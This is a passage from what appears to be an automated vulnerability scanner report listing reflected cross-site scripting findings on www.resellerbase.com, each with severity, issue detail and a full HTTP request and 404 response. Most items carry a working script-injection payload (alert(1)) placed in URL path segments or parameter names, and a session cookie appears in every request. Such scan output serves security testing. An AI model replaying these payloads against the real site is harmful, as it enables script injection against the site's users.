This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images287b1<script>alert(1)</script>19ca3e5c80c/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images287b1<script>alert(1)</script>19ca3e5c80c/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.5170. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b22c8<script>alert(1)</script>aaf115546fc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/ratingb22c8<script>alert(1)</script>aaf115546fc/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/ratingb22c8<script>alert(1)</script>aaf115546fc/4.gif was not found on this server.</p>
...[SNIP]...

2.5171. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload fcffc<script>alert(1)</script>91af09581d2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/4.giffcffc<script>alert(1)</script>91af09581d2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/4.giffcffc<script>alert(1)</script>91af09581d2 was not found on this server.</p>
...[SNIP]...

2.5172. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 95aaa<script>alert(1)</script>d758f6624fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/4.gif?95aaa<script>alert(1)</script>d758f6624fc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/4.gif?95aaa<script>alert(1)</script>d758f6624fc=1 was not found on this server.</p>
...[SNIP]...

2.5173. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5f249<script>alert(1)</script>4661878c4ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service5f249<script>alert(1)</script>4661878c4ea/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service5f249<script>alert(1)</script>4661878c4ea/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5174. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6cb92<script>alert(1)</script>ce0e574b5f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other6cb92<script>alert(1)</script>ce0e574b5f8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other6cb92<script>alert(1)</script>ce0e574b5f8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5175. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f0aa2<script>alert(1)</script>5224f55066f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesf0aa2<script>alert(1)</script>5224f55066f/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesf0aa2<script>alert(1)</script>5224f55066f/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5176. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 72522<script>alert(1)</script>4cf17b421d5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos72522<script>alert(1)</script>4cf17b421d5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos72522<script>alert(1)</script>4cf17b421d5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5177. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c7265<script>alert(1)</script>b6485fbf4ab was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/imagesc7265<script>alert(1)</script>b6485fbf4ab/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/imagesc7265<script>alert(1)</script>b6485fbf4ab/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5178. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a0aa2<script>alert(1)</script>50b1adb4256 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/ratinga0aa2<script>alert(1)</script>50b1adb4256/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/ratinga0aa2<script>alert(1)</script>50b1adb4256/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5179. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4abc6<script>alert(1)</script>d1d506d6aec was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/search.php4abc6<script>alert(1)</script>d1d506d6aec?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/search.php4abc6<script>alert(1)</script>d1d506d6aec?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5180. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c0c4b<a>2e3738c6da0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchc0c4b<a>2e3738c6da0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchc0c4b<a>2e3738c6da0&opt=2 was not found on this server.</p>
...[SNIP]...

2.5181. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload afe69<a>6dd4b09ad2f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...afe69<a>6dd4b09ad2f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...afe69<a>6dd4b09ad2f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5182. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62513<script>alert(1)</script>31d33e36103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&62513<script>alert(1)</script>31d33e36103=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&62513<script>alert(1)</script>31d33e36103=1 was not found on this server.</p>
...[SNIP]...

2.5183. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8b8b3<a>a2d667fcc34 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=28b8b3<a>a2d667fcc34 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=28b8b3<a>a2d667fcc34 was not found on this server.</p>
...[SNIP]...

2.5184. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5daca<script>alert(1)</script>6e22ae67f59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service5daca<script>alert(1)</script>6e22ae67f59/other/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service5daca<script>alert(1)</script>6e22ae67f59/other/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5185. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9503a<script>alert(1)</script>3df546728d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other9503a<script>alert(1)</script>3df546728d1/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other9503a<script>alert(1)</script>3df546728d1/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5186. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2433d<script>alert(1)</script>f20ec48bd0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes2433d<script>alert(1)</script>f20ec48bd0f/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes2433d<script>alert(1)</script>f20ec48bd0f/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5187. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f34dd<script>alert(1)</script>bb008c87cde was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmosf34dd<script>alert(1)</script>bb008c87cde/images/review/ HTTP/1.1
